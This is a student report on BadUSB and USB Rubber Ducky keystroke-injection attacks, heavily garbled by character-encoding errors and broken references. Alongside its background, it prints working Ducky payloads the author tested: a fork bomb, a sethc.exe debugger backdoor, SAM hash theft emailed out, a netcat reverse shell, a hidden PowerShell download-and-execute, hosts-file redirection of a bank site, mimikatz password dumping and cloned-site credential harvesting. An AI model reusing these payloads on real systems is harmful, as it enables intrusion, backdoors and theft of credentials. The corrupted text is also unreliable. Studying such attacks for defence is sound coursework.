Shawn Seaman Professor Hayajneh Network Security and Perimeter Protection
Bad USB:Abusing the Inherent Trust Trust of I! "e#ies
USB has become such a standard interface in the IT wor$d because of its sheer #ersati$ity% There is a mu$titude of de#ices that connect con nect through the USB interface& making it a '( interface for many) ty*e of techno$ogy% techno$ogy% If so many different different hardware im*$ementations im*$ementations can connect through the USB standard& what ty*es of security mechanisms are offered and what is the *rocess of discerning the ty*e of hardware+ Unfortunate$y& Unfortunate$y& the bu$k of USB de#ices on the market are in a sense HI",s-Human Interface "e#ices.& or more sim*$y *ut& de#ices that re$y on direct *hysica$ interaction interaction with human beings% In a $itera$ sense& sense& it wou$d seem that there there wou$d not be many& if any& any& *ractica$ security methods a**$ied to USB% /hy wou$d a workstation not trust a USB de#ice& when it it is trusted by the the human+ Humans trust keyboards& keyboards& so therefore& com*uters trust keyboards% keyboards% /ebcams or keyboard keyboard de#ices being engineered on the firmware $e#e$& to become Trojan horses that secret$y de$i#er *ay$oads was ne#er fathomed b y the IT security wor$d& and for good reason% The *hysica$ com*onents that makeu* a USB de#ice and the fact that com*anies do not $ock down their firmware on the de#ices they *roduce& has $ed to the abi$ity by security researchers to e0*$oit USB% /ith /ith the use of custom code injection& firmware re#erse engineering& and the inherent trust of !S,S across a$$ *$atforms-1inu0& 2ac& and /indows.& /indows.& to trust USB de#ices& researchers ha#e tru$y been ab$e to turn good de#ices e#i$% /hat e0act$y is USB and BadUSB+ BadUSB+ USB stands for Uni#ersa$ Uni#ersa$ Seria$ Bus& it is a standard de#e$o*ed in the ear$y (334,s that created the communication *rotoco$s in a bus connection& communication and *ower su**$y between com*uter-or motherboard. and the other de#ice%( The USB *rotoco$ simu$taneous$y *owers the de#ice as we$$ as created mediums for data transfer& data stream& and communication%5rror: communication%5rror: 6eference source not found BadUSB is a new c$ass c$ass of attack that focus re$ies on the USB interface itse$f% This e0*$oit is technica$$y se*arate from o*erating system security& security& though it does re#e$ in the fact that machines trust USB by defau$t% In a sense the BadUSB takes ad#antage of the $ack of embedded security in USB de#ices% The USB de#ice& whether it is a keyboard& webcam& mouse& or e#en a joystick& becomes ma$icious
1
(http://msdn.microsoft.com/enus/library/windows/hardware/53893!"8#$#s.85!"9.asp%& n.d.'
p. 1
through de#ice tam*ering& not !S tam*ering% tam*ering%7 This makes BadUSB so so dangerous% It dua$$y wie$ds the abi$ity to be hidden in a joystick or webcam-are workstations going to scan joysticks+.& and has the #ersati$ity of being !S inde*endent% 2any #irus *rogrammers on$y target s*ecific !S,s due to the different $ibraries or de*endencies they contain%-Trojans coded in 8a#a do infect a$$ !S,s. !S,s. BadUSB does not face the *rob$em of de*endencies& as for the most *art& a$$ !S,s wi$$ acce*t& for e0am*$e: keyboards% It is #ery im*ortant to know what BadUSB is not& before tru$y understanding what it indeed is% 9iruses& 9iruses& Trojans& Trojans& worms& or other ma$ware reuire !S de*endent $ibraries& d$$,s& and other de*endencies& not to mention anti#irus and firewa$$ e#asion& but BadUSB is the o**osite of this ty*e ty*e of attack #ector% BadUSB is not a *iece of ma$ware sitting on the f$ash storage *ortion of the USB de#ice%5rror: de#ice%5rror: 6eference source not found Turning a USB ;e#i$) ;e#i$) re$ies on actua$$y re*rogramming the USB de#ice itse$f at the firmware $e#e$% "ee* $e#e$ code injection into the firmware& through re#erse engineering& can turn a sim*$e USB micro*hone into a de#ice ca*ab$e of injecting keystrokes si$ent$y% si$ent$y% /hat damage can keystroke injection do+ The *ossibi$ities *ossibi$ities are indeed end$ess& and they wi$$ be demonstrated in this re*ort by e#en a no#ice user% Si$ent$y e0ecuting commands #ia /indows /indows PowerShe$$ can cause ha#oc on a workstation% workstation% So it is understood understood that BadUSB can emu$ate a keyboard% Anti#irus Anti#irus wi$$ not be ab$e to scan this as ma$icious& it sim*$e sim*$e reads as a keyboard% The de#ice can now e0ecute e0 ecute *ossib$e *owershe$$ commands on the !S to de$ete fi$es& infi$trate fi$es& or insta$$ ma$ware% The host,s fi$e of a workstation can be edited& which wi$$ redirect users to s*ecific websites of the attacker,s choice% /ith /ith the right socia$ engineering attack im*$ementation& this can cause credentia$s to be sniffed through through the use of c$oned websites% A second attack #ector of BadUSB is that of s*oofed network ada*ters%5rror: ada*ters%5rror: 6eference source not found This can be a huge *rob$em if if the attacker embedded code in this e0am*$e to change the com*uters "NS settings to redirect traffic% Security mechanisms wi$$ o#er$ook this attack& and 2an in the 2idd$e attacks wi$$ become easy% easy% It wou$d be sim*$e to im*$ement a rogue access *oint& ha#ing unknowing users connect to it& and then subjecting them to 2an in the 2idd$e attacks% They wou$d be none the wiser considering there is no *rotection *rotection against detecting a USB mouse transforming into a s*oofed network ada*ter% ada*ter% Another e0*$oit BadUSB can take ad#antage of is the fact that many de#ices are *$ugged in and recogni
https://srlabs.de/blo/wp-con https://srlabs.de/blo/wp-content/uploads/"1)/*/+ tent/uploads/"1)/*/+,abs-a ,abs-ad+-l d+-lac0atac0at-#1.pdf #1.pdf
p. "
*re#ious$y% *re#ious$y% A$$ USB de#ices ha#e a contro$$er chi*% The user doesn,t interact with contro$$er contro$$er chi*% An e0am*$e of this wou$d be if the user is interacting with f$ash dri#e for fi$e storage& the y are on$y interacting with the mass storage *ortion of the de#ice% The same f$ash dri#e stores a firmware which is e0ecuted by the contro$$er chi*% Again the user does not interact with the firmware& on$y the fact that the USB is deemed 'a mass storage de#ice%) Unfortunate$y& this goes for the !S as we$
%$So if the workstation on$y sees what the USB wants it to see& but not the underworking at the firmware $e#e$& it can be assumed that there are some security f$aws that cou$d be s*awned from this design% It shou$d be understood then the the mechanics behind how USB de#ices identify themse$#es to workstations% workstations% The host contro$$er inside inside the workstation wi$$ recogni
or e0am*$e& an e0terna$ hard dri#e that gets assigned the same dri#e $etter e#ery time it is *$ugged in& which works out famous$y when an automatic !S backu* software has that *ath a$ready stored% Take Take a $ook at this gra*hica$ re*resentation of USB identification standards& and e0*$oiting them wi$$ beco me
p. 3
more c$air#oyant% /e are assuming here that the attacker has a$ready re#erse engineered the firmware and has begun to inject code into the em*ty s*aces in said firmware%
An attacker can modify the interface to show:(?webcam (@?#ideo%5rror: (@?#ideo%5rror: 6eference source not found This is te$$ing the the host contro$$er of a workstation that a f$ash storage de#ice has audio and #ideo ca*abi$ity ca *abi$ity&& and to be treated as such by $oading said dri#ers% 5nd*oints are data *orts res*onsib$e for streams of information through the bus% Think of end*oints $ike TP streams% streams%5rror: 5rror: 6eference source not found The end*oints *ortion *ortion of the USB wi$$ a$ways a$ways ha#e a contro$ *ortion identified 4% Here the attacker modified the end*oints to no $onger be the data transfer *rotoco$ that was suitab$e for the f$ash storage de#ice& but instead has to$d the workstation to accommodate for #ideo transfer streams and audio transfer streams% This storage de#ice is being com*$ete$y read as a webcam at this *oint% This has the makings makings of an e#i$ firmware firmware that accesses the audio and #ideo ca*tures of a workstation and uses them for insidious reconnaissance% U*on $ooking at the seria$ number number modification& a few im*ortant im*ortant things can be noted% The seria$ numbers are are not e#en the same $ength% USB does not ha#e a fi0ed seria$ number or any ty*e of constant method behind USB seria$ numbers%5rror: numbers%5rror: 6eference source not found They are com*$ete$y randomiirst$y the de#ice is *$ugged into the USB *ort% At this *oint the de#ice boots u* as it is *owered on& and the boot $oader initia$i
p. )
6eference source not found This ga#e them com*$ete access to the USB firmware to make the USB de#ices *erform and a**ear as any ty*e of USB de#ice% The first ste* ste* was to find $eaked firmware on net% In order to re#erse engineer engineer the USB chi* from the s*ecific 7 com*anies they targeted& they needed the necessary code% They then a**$ied heuristics heuristics to code% They counted matches with start and ca$$ instructions instructions for different memory $ocations%5rror: $ocations%5rror: 6eference source not found This found This a$$owed a$$owed them to find the descri*tors descri*tors in the binary code% !nce they essentia$$y had the firmware ma**ed out& they insta$$ed their own hooks and injected their own code in unused *arts of the firmware% -this cou$d be *erformed on webcams& keyboards etc%& but they focused on a f$ash storage de#ice. This ty*e of re#erse re#erse engineering they a**$ied to on$y two chi*s% chi*s% But nothing it sto**ing ma$icious users with resources to re#erse engineer many chi*s from many com*anies% Noh$ and 1e$$ ran mu$ti*$e demo attacks% They ran the attacks on a 1inu0 system% The first attack re#o$#ed around gaining admin credentia$s and esca$ating *ri#i$eges% *ri#i$eges% 1inu0 reuires ma$ware to run with root *ri#i$eges to infect other USB de#ices or become a network ada*ter a da*ter that changes "NS settings% settings% They needed to esca$ate esca$ate *ri#i$eges to get root access% How was this this done+ They got the sudo *assword on the machine% The USB e0ecuted kb commands to acti#ate and restart the screensa#er% screensa#er% The user at this *oint re?entererd the *assword to get off the screensa#er& and then the ma$ware sto$e the sudo-admin. *assword by ma$ware injected in a binary re$ated to the screensa#er $ibraries%5rror: $ibraries%5rror: 6eference source not found Now further damage can be done to the system as as Noh$ and 1e$$ now had com*$ete com*$ete root access% This a$$ re$ied on keyboard injection and code injected into screensa#er de*endencies& and none of the ma$icious acti#ity took *$ace on the storage *ortion that interacts interacts with the !S% This com*$ete$y e#ades anti#irus% The second attack had the USB stick s*oofed s*oofed as a network ada*ter% They successfu$$y got the USB storage de#ice to act as a "HP ser#er and assign an IP& but not assign a defau$t gateway% This te$$s the workstation workstation to use the "NS ser#er but doesn,t te$$ it how to reach it%5rror: it%5rror: 6eference source not found This is a form of "NS *oisoning% A rea$ wor$d im*$ementation of this attack wou$d be when a #ictim browses to htt*s:chase%com& but goes to attackers #ersion of a c$oned chase%com& enters their credentia$s through the s*oofed site% 9irus 9irus scanners won,t *ick u* on this% They a$so *ro*osed a theoretica$ theoretica$ #irtua$ machine breakout attack% A USB de#ice *rogrammed to s*awn into into two USB de#ices& where the second second de#ice connects to the host com*uter& com*uter& then begins injection to to *i$$age the system% This cou$d be a troub$e for backed u* c$oud ser#ers on #irtua$ machines% Noh$ and 1e$$ a$so *erformed *erformed attacks using an android *hone% They sim*$y *$ugged the *hone into a workstation to charge the *hone% Not on$y did the *hone charge& but they *erformed the "NS attack as we$$%5rror: we$$%5rror: 6eference source not found It has been discussed in great detai$ what BadUSB can do& but what security mechanisms can be taken to a#ert the e0*$oit+ Are software ro$$backs ro$$backs a #iab$e so$ution+ onsider this scenario% The system admin decides to reinsta$$ o*erating systems& or do ro$$backssystem restores to c$ean u* the attack% They need to reco#er reco#er from the #irus& and wi$$ most $ike$y $ose time and money during the effort% effort% The *rob$em is is that this this is not *atchab$e #ia software% If the keyboard has infected firmware& the system admin wou$d ha#e to rea$i
p. 5
seria$ number% number% Perha*s a firewa$$ so$ution so$ution does ha#e this feature% It wou$d not matter% matter% Seria$ numbers are not mandatory as mentioned before& and can be s*oofed% If the user a$$ows a keyboard from 1ogitech for e0am*$e& with a certain seria$ number& and the firewa$$ white $ists itDDthe BadUSB e0*$oit can detect this and s*oof s*oo f this seria$%5rror: seria$%5rror: 6eference source not found Anti#irus meet a simi$ar fate of ineffecti#eness ineffecti#eness as its *redecessors% They are es*ecia$$y ineffecti#e if the USB de#ice is *$ugged in at boot time and a rootkit is insta$$ed #ia boot bo ot sector& as a$ready discussed%5rror: discussed%5rror: 6eference source not found /hat if de#ice is *$ugged in during $ogin and is scanned immediate$y+ immediate$y+ The scanner wants to read read contents of the de#ice but this this is done with the *ermission and assistance of the firmware% If the firmware is *rogrammed to $ock itse$f down from being read& the scanner is use$ess%5rror: use$ess%5rror: 6eference source not found Possib$e fi0es on$y e0ist in the rea$m of the hardware manufacturers at this time% 2anufacturers need to im*$ement a $ocked firmware% firmware% The *rob$em with this is now there can be no feasib$e feasib$e way to ha#e firmware u*dates% It is abso$ute$y un*ractica$ to $ock down the firmware% firmware% It is *ossib$e to use cry*togra*hic signatures for firmware but this is hard and e0*ensi#e to im*$ement on USB microcontro$$er chi*s% It is so cost$y cost$y that this im*$ementation im*$ementation wou$d most certain$y certain$y ne#er become mainstream and e#o$#e into a USB standard of security% security%5rror: 6eference source not found 50amination of the Iron=ey USB storage de#ice& and its hefty *rice *rice tag of o#er (44 do$$ars for (E gb of data storage& *ro#ides * ro#ides the assurance of cry*togra*hic signing not becoming beco ming a
standard%5rror: standard%5rror: 6eference source not found Ironkey offers mi$itary grade encry*ted USB *roducts& as we$$ as *hysica$ *rotection% They assure that there USB storage de#ices are not susce*tib$e to BadUSB attacks% This is one e0am*$e of a com*any using code signing encry*tion methods to authenticate firmware u*dates% If the firmware firmware cannot be authenticated authenticated it cannot be used% It basica$$y se$f?destructs% This is e0*ensi#e& time$y and hard to do with a USB contro$$er chi*& and therefore in a$$ $ike$ihood wont s*read to the masses as a USB standard% It is ob#ious and common sense that to ha#e any effect and com*romise security& the attacker needs at one *oint or another& whether by his own hands or the #ictim& # ictim& *hysica$ access to a machine% /hat methods can be used to infect users with BadUSB+ The art of socia$ engineering sticks out as the the most effecti#e effecti#e way to uti$i
http://www.iron0ey.com/en-+/solutions/protect-aainst-badusb.html
p. 2
that he wou$d actua$$y s*rink$e ma$icious USB dri#es in co m*any *arking $ots& just assuming em*$oyees wou$d *ick them u* and use them%5rror: them%5rror: 6eference source not found 5#eryone $ikes a free storage de#ice% It can be im*ortant to to take ad#antage of *hysica$ security if if networking security is u* to *ar% If an attacker cannot get through the network& it is *ossib$e if they had the wi$$& to infi$trate com*anies *hysica$$y& *hysica$$y& and dro* USB de#ices on o n sysadmin desks& or *erform the attacks themse$#es at an unmanned unmanned workstation% If imagination *ermits& *ermits& an ad#ersary with huge amounts of resources& *ackages BadUSB infected keyboards with workstations meant to be shi**ed to a go#ernment $ocation% They gain access to the workstations workstations before shi*ment& and swa* out the keyboards for the same one& just with a modified firmware% Anything is *ossib$e *ossib$e when it comes to BadUSB attacks& and that is most$y due to how re$ied they are on as HI",s% The USB 6ubber "ucky e0em*$ifies how any USB de#ice can become an 4. The 6ubber "ucky& by the com*any HakF& has the motto& 'I> IT GUA=S 1I=5 A =5B!A6"& AN" TP5S 1I=5 A =5B!A6"& IT 2UST B5 A =5B!A6") The rubber ducky is a @4 do$$ar USB de#ice that is used by *enetration testers or ma$icious ma$icious attackers% It acts as a keyboard more s*ecifica$$y& it,s it,s a keyboard injection too$ with its own scri*ting $anguage that the attacker can customi
)
https://code.oole.com/p/duc0 https://code.oole.com/p/duc0y-decode/ y-decode/
p. *
#ita$ to go o#er the "ucky synta0 synta0 and commands% The command
652& is ana$ogous to that that of a comment command% Any code that begins on a $ine with 652 wi$$ not be e0ecuted% It shou$d be known that each command ha**ens on a se*arate $ine in a synchronior e0am*$e& '"51A '"51A F444& CUI r) wou$d de$ay for F seconds before o*ening the the run bo0% CUI d wi$$ wi$$ switch to to the deskto*% The SHI>T command is a$so usefu$ as it is used to na#igate through te0t se$ection se$ection bo0es% A$so can be combined with PgU*& Pg"n& and many other keys for usefu$ functions%5rror: functions%5rror: 6eference source not found 50am*$e: 'SHI>T INS56T) INS56T) is the co*y *aste function on most o*erating systems% systems% The A1T A1T and !NT6!1 key commands are a$so used in combination with keyboard characters to e0ecute many commands% A1T A1T f wi$$ *u$$ u* a fi$e menu& and A1T A1T s wi$$ sa#e the fi$e%5rror: fi$e%5rror: 6eference source not found The arrow commands 'A66!/ UP& A66!/ "!/N& A66!/ 15>T& A66!/ 6ICHT& 6ICHT&)) are se$f?e0*$anatory directiona$ na#igation commands% This wi$$ be a wa$k through of the
p. 8
most sim*$e *rogram% This is to to understand the *rocess before the the *rograms get more com*$e0% The duckencode%jar is na#igated na#igated to #ia command *rom*t% *rom*t% 50ecute ja#a jar duckencode%jar i easy*ay$oad%t0t o inject%bin% This takes the "uckyscri*t "uckyscri*t in the te0t fi$e fi$e and out*uts it to an injectab$e jar fi$e% After co*ying the *ay$oad to the S" card and $oading it to the "ucky& "ucky& the scri*t was e0ecuted% "51A 444 CUI r "51A (444 ST6INC winword%e0e 5NT56 "51A 7444 5NT56 ST6INC 2 NA25 IS SHA/N S5A2AN& THIS IS TH5 2!ST BASI I2P1525NTATI!N !> TH5 IN85TAB15 USB "59I5JS APABI1IT ST6INC 5NT56 ST6INC T! IN85T =5ST6!=5S !N A 2AHIN5% H511! /!61"K "51A 444 CUI r "51A 744 ST6INC note*ad 5NT56 "51A 744 ST6INC He$$o /or$dKKK
p. 9
5NT56 5rror: 5rror: 6eference source not found
This sim*$e scri*t o*ened u* 2icrosoft /ord /ord on the workstation and e0ecuted the string s*ecified% The second scri*t was a fork bomb batch scri*t& that initia$iork bombs are denia$ of ser#ice attacks that continua$$y ca$$ on themse$#es in the code& code & in order to constant$y re*$icate ti$$ ti$$ there are no resources $eft on the P% !n$y re$e#ant code wi$$ be shown from now on% >u$$ codes wi$$ be u*$oaded se*arate$y% se*arate$y% ST6INC cd :LProgram"ataL2icrosof :LProgram"ataL2icrosoftL/indowsL tL/indowsLStart Start 2enuLProgramsLStartu*L 5NT56 ST6INC co*y con a%bat 5NT56 ST6INC Mecho off 5NT56 ST6INC :STA6TF This ne0t scri*t wi$$ de$ete /indows /indows U*dates% This scri*t was es*ecia$$y usefu$ usefu$ for making a *atched /indows /indows machine #u$nerab$e to e0*$oits% / 5NT56 ST6INC Oin*ut J=B7Q@F(QJ 5NT56 ST6INC Oin*ut Oin*ut%6e*$ace-J=BJ& JJ. 5NT56 ST6INC OcmdString Jwusa uiet norestart uninsta$$ kb:J R Oin*ut 5NT56 ST6INC In#oke?50*ression ?ommand OcmdString 5NT56 ST6INC 65C A"" H=12LS!>T/A65L2icrosoftL/indows NTLurrent9ersionLImage >i$e 50ecution !*tionsLsethc%e0e) R R ' # "ebugger t 65CS d :LwindowsLsystem7Lcmd%e0e 5NT56 E The $ine 'ST6INC Oin*ut J=B7Q@F(Q) J=B7Q@F(Q ) is es*ecia$$y im*ortant as that $ine is where you insert the u*date you want remo#ed% 2u$ti*$e *ay$oads can be *ut onto the S" card& which means mu$ti*$e u*dates can be uninsta$$ed% After this scri*t scri*t was run on the target com*uter& com*uter& Armitage Armitage
5
https://ithub.com/ha05darren/+-,ubber-4uc0y/wi0i/ayload---for0-bomb http://www.duc0tool0it.com/+cript+election.6sp
2
p. 1
was used to scan for& and e0ecute a *ay$oad on the target host% A re#erse she$$ was initiated and
the machine was e0*$oited% The ne0t attack is ca$$ed '"uckS$ur*) and it acts as a keyboard injector as we$$ as a simu$taneous storage de#ice% The *oint of this attack is to uick$y and si$ent$y si$ent$y co*y the entire contents of '2y "ocuments&) to the "ucky% "ucky% It uti$irom Jshawn*ortscanMgmai$%comJ 5NT56 ST6INC O6e*ort5mai$%To%Add-Jshawn*ortscanMgmai$%comJ. O6e*ort5mai$%To%Add-Jshawn*ortscanMgmai$%comJ. 5NT56 ST6INC O6e*ort5mai$%Subject J"uck To Too$kit o$kit 6econ 6e*ortJ 5NT56 *
https://forums.ha05.or/ind https://forums.ha05.or/inde%.php7/topic/31 e%.php7/topic/31*9-payload-duc0-s *9-payload-duc0-slurp-#"-s lurp-#"-silent/ ilent/
p. 11
ST6INC O6e*ort5mai$%Body JP$ease find attached your reconnaissance re*ort%J 5NT56 ST6INC O6e*ort5mai$%Attachments%5rror: O6e*ort5mai$%Attachments%5rror: 6eference source not found In this scri*t *ortscanbyshawnMgmai$%com scri*t *ortscanbyshawnMgmai$%com and and *assword(7@ were used for demo *ur*osed& but these can be customiTP u*$oad as we$$ as ob#ious$y storing to de#ice% Another attack $ooked at during the e0amination of the "ucky was the SA2 e0tract attack% The %SA2 fi$e fi$e stores the /indows /indows $ogin hashes% It was o*ted that the %SA2 %SA2 fi$e be Q e0tracted and then emai$ed to #ia gmai$% gmai$% Here is a sni**et of code: ST6INC OcreateShadow -gwmi ?1ist /in7Shadowo*y.%reate-J:LJ& J$ientAccessib$eJ. 5NT56 ST6INC Oshadow gwmi /in7Shadowo*y W + X O%I" ?e OcreateShadow%ShadowI" Y 5NT56 ST6INC OaddS$ash Oshadow%"e#ice!bject Oshadow%"e#ice!bject R JJ 5NT56 ST6INC cmd c mk$ink :Lshadowco*y OaddS$ash 5NT56 ST6INC o*y?Item o* y?Item J:Lshadowco*yL/indowsLSystem7LconfigLSA2 Another attack that is high$y effecti#e is the the re#erse she$$ using Netcat% Netcat% Netcat& or Ncat& is a too$ de#e$o*ed by the same com*any that brought the *ort scanned Nma* into the works% Netcat can read and write data across a network between two hosts% In $ack of a better term& it 'cat) commands data streams%3 If a firewa$$ is not *ro*er$y configured& configured& as in it b$ocks incoming incoming traffic but doesn,t monitor monitor what is coming out& a Netcat re#erse she$$ wi$$ come in handy% handy% This attack a$$ows Netcat to be down$oad and e0ecuted on the #ictim machine% U*on e0ecution& a session is o*ened on the #ictim& #ictim& where they begin to $isten $isten on a s*ecified *ort% Since we as the attackers a$ready know the *ort it wi$$ be $istening on& we wi$$ be engaged in two way connection with the #ictim% 'ST6INC nc%e0e Z1IST5N56 IP[ Z1IST5N56 P!6T[ ?e cmd%e0e d)(4 This sni**et of code from the "ucky scri*t is an im*ortant one% 6e*$ace the $istener IP and $istener *ort with the IP of the #ictim on the interna$ network and the *ort you wish to connect to% This was tested on /indow,s /indow,s Q as the attacker machine and /indow,s as the #ictim on a #irtua$ machine and it was successfu$% The "ucky is #ery efficient at using the *owershe$$& and the *owershe$$ can be a #ery *owerfu$ too$% This sim*$e scri*t wi$$ go to a webser#er& down$oad a *ay$oad& and e0ecute& whi$e adding *ersistence for a nice fina$ touch% (( 8
https://ithub.com/ha05darren/+-,ubber-4uc0y/wi0i/ayload---retrie#e-sam-and-systemfrom-a-li#e-le-system 9 http://nmap.or/ncat/uide/ http://nmap.or/ncat/uide/ 1 https://ithub.com/ha05darren/+-,ubber-4uc0y/wi0i/ayload---netcat--downloadand-re#erse-shell 11 https://ithub.com/ha05darren/+-,ubber-4uc0y/wi0i/ayload---powershell-wet--e%ecute
p. 1"
CUI r "51A (44 ST6INC *owershe$$ ?windowsty$e hidden -new?object System%Net%/eb$ient.%"own$oad>i$e-Jhtt*:shawns*ay$oadbob%o$dJ&J\T52P\Lbob%e0eJ.V Start?Process \T52P\Lbob%e0e 5NT56 The sim*$e added string 'windowsty$e hidden&) wi$$ kee* the *owershe$$ in#isib$e during this entire e0ecution% Powershe$$ wi$$ use use the wget command to *u$$ the the content from 'shawns*ay$oad) and target wi$$ be e0*$oited% The attacker can a$so edit the hosts fi$e for good measure if they wish% In this e0am*$e& we can set www%chase%com www%chase%com & & to redirect to a ma$icious #ersion # ersion that wi$$ *u$$ the credentia$s%5rror: credentia$s%5rror: 6eference source not found T61?SHI>T 5NT56 "51A @44 ST6INC cd :L/indowsLSystem7Ldri#ersLetcL :L/indowsLSystem7Ldri#ersLetcL 5NT56 "51A @44 ST6INC echo E@%(@3%(77%3@ www%chase%com]]hosts hase wi$$ be the site the #ictim wi$$ attem*t to go to& whereas the IP is the site the #ictim wi$$ be redirected to% This ne0t 6ubber "ucky attack uti$i
http://blo.opensecurityr http://blo.opensecurityresearch esearch.com/"1"/2/usin-mim .com/"1"/2/usin-mimi0at;-to-dump-pa i0at;-to-dump-passwords.h sswords.html tml https://ithub.com/ha05darren/+-,ubber-4uc0y/wi0i/ayload---download-mimi0at;!"<rab-passwords-and-email-them-#ia-mail
13
p. 13
ST6INC sekur$sa::$ogonPasswords fu$$ 5NT56 The "ucky as shown a$ready a $ready&& can edit the hosts fi$e& but what wh at if the attacker did a more ad#anced "NS *oisoning& and a$so used a *enetration *enetration testing too$ to further further the b$ow% The be$ow sni**et of code is the meat and *otatoes of this "NS *oisoning attack% (@ redirectionAddress J(4%7FF%(E3%E J 5NT56 ST6INC OredirectedSite Jwww%chase%com$oginJ Jwww%chase%com$oginJ 5NT56 ST6INC Ohosts OredirectionAddress R J J R OredirectedSite 5NT56 ST6INC Ohosts7 OredirectionAddress R J www%J R OredirectedSite 5NT56 ST6INC Add?ontent ?9a$ue ?9a$ue Ohosts ?Path J:L/IN"!/SLSST527L"6I956SL5TLH!STSJ 5NT56 ST6INC Add?ontent ?9a$ue ?9a$ue Ohosts7 ?Path J:L/IN"!/SLSST527L"6I956SL5TLH!STSJ The attacker shou$d modify 'OredirectedSite) to the site the #ictim assumes to be #isiting% Then the attacker shou$d modify the 'OredirectedSite) to the IP they are running the c$oned #ersion of the website on% ommon e0am*$es wou$d be socia$ media sites such as Twitter Twitter and >acebook& or financia$ institutions institutions such as hase or T"Bank% T"Bank% The attacker can now send a s*oofed emai$ to the #ictim& te$$ing them they need to re?enter their credentia$s at chase%com% Sus*icion wi$$ be a#oided as the attacker can ty*e the actua$ chase U61 into the emai$% Using =a$i 1inu0 too$ S5T& the attacker wi$$ be broadcasting this c$oned chase site on the network%
1)
https://ithub.com/ha05darren/+-,ubber-4uc0y/wi0i/ayload---local-dns-poisonin
p. 1)
hoose o*tion (: Socia$ 5ngineering Attacks%
p. 15
p. 12
Then se$ect o*tion 7% The attacker wants to e0*$oit the #ictim,s #ictim,s browser% browser% Then se$ect o*tion for redentia$ Har#ester Attack%
p. 1*
Now the attacker wi$$ choose to c$one chase%com%
p. 18
In the screenshot abo#e www%chase%com www%chase%com was was entered entered & and c$oned% The i* address (4%7FF%(E3%E wi$$ be the attackers 1H!ST or e0ternat host i*% The on$y ste* $eft is to start the A*ache ser#er% ser#er% !nce the #ictim attem*ts to go to www%chase%com www%chase%com&& they wi$$ be redirected to a c$oned hase website at (4%7FF%(E3%E& and the credentia$s $ogged% The fina$ attack was *erformed on a Samsung Ca$a0y S@& running a fu$$y u*dated #ersion of Android% Android% The *oint of this attack was to brute force a @ digit *in% These wi$$ be a$$ combinations from 4444 to 3333% That is nine thousand nine hundred and ninety nine *ossib$e *in combinations% 5#en Android Android and I*hone,s wi$$ read read USB de#ices as keyboards% The 6ubber "ucky thankfu$$y came with an ada*ter% ada*ter% The ma$e side of the the "ucky *$ugs direct$y into a
p. 19
ty*e?a fema$e connector& and that is con#erted on the end to a micro?USB ma$e connector% This *$ugs direct$y into the charging *ort of Samsung Ca$a0y S@% It shou$d be noted that after fi#e fai$ed *in attem*ts on an Android& the Android de#ice wi$$ $ock for 4 seconds%5rror: seconds%5rror: 6eference source not found Ana$y
p. "
source not found /hen testing on the Android Android the *in was set to 4443& for time sa#ing sake& and it did work f$aw$ess$y% f$aw$ess$y% /hether uti$i
%$Sources
(% htt*:msdn%microsoft%commenus$ibrarywindowshardwareffFQ34\7Q##s%QF\
7% % @% F% E%
p. "1
73%as*0 htt*s:sr$abs%deb$ogw*?contentu*$oads74(@4S61abs?BadUSB?B$ackHat?#(%*df htt*:www%ironkey htt*:www %ironkey%comen?USso$utions*rotect %comen?USso$utions*rotect?against?badusb%htm$ ?against?badusb%htm$ htt*s:code%goog$e%com*ducky?decode htt*s:github%comhakFdarrenUSB?6ubber?"uckywikiPay$oad???fork?bomb htt*:www htt*:www%duc %ducktoo$k ktoo$kit%com it%comScri Scri*tSe$ *tSe$ection ection%js* %js*
% htt*s:forums%hakF%orginde0%*h*+to*ic4(3?*ay$oad?duck?s$ur*?#7?si$ent Q% htt*s:gi htt*s:github%c thub%comhak omhakFdarr FdarrenUSB? enUSB?6ubber 6ubber?"ucky ?"uckywiki wikiPay$oa Pay$oad???ne d???netcat? tcat?>TP? >TP? down$oad?and?re#erse?she$$ 3% htt*s:g htt*s:github% ithub%comha comhakFdarr kFdarrenUSB? enUSB?6ubber 6ubber?"ucky ?"uckywiki wikiPay$ Pay$oad???* oad???*owersh owershe$$? e$$? wget???e0ecute (4% htt*:b$og%o*ensecurityresearch%com74(74Eusing?mimikat
p. ""
